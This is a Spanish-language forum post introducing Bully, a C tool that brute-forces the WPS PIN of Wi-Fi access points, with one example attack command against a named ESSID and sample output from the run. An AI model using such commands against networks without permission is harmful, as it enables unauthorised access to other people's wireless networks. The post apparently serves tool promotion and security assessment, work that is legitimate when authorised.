Bully - Ataques a redes con WPS

Iniciado por ANTRAX, Octubre 28, 2019, 12:17:31 PM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.


Bully es una implementación del ataque de fuerza bruta al protocolo WPS, escrito en C.

Es conceptualmente identico a otros programas, en tal caso, explota la vulnerabilidad del pin WPS.

Contiene varias ventajas sobre el código original de Reaver. Incluye algunas dependencias, optimización de memoria, rendimiento del cpu y un conjunto robusto de configuracines.

Corren en Linux y fue desarrollado para ejecutarse en sistemas embebidos (OpenWrt, Ddwrt, etc) independiente de la arquitectura.

Forma de uso:

Atacar el ESSID (-e 6F36E6) con la interfaz en modo monitor (mon0): bully -e 6F36E6 mon0

Código: text
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[X] Unknown frequency '-113135872' reported by interface 'mon0'
[!] Using '00:1f:33:f3:51:13' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '6F36E6' on channel 'unknown'
[+] Got beacon for '6F36E6' (9c:d3:6d:b8:ff:56)
[+] Switching interface 'mon0' to channel '8'
[!] Beacon information element indicates WPS is locked
[!] Creating new randomized pin file '/root/.bully/pins'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '54744431'


Repo GitHub: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta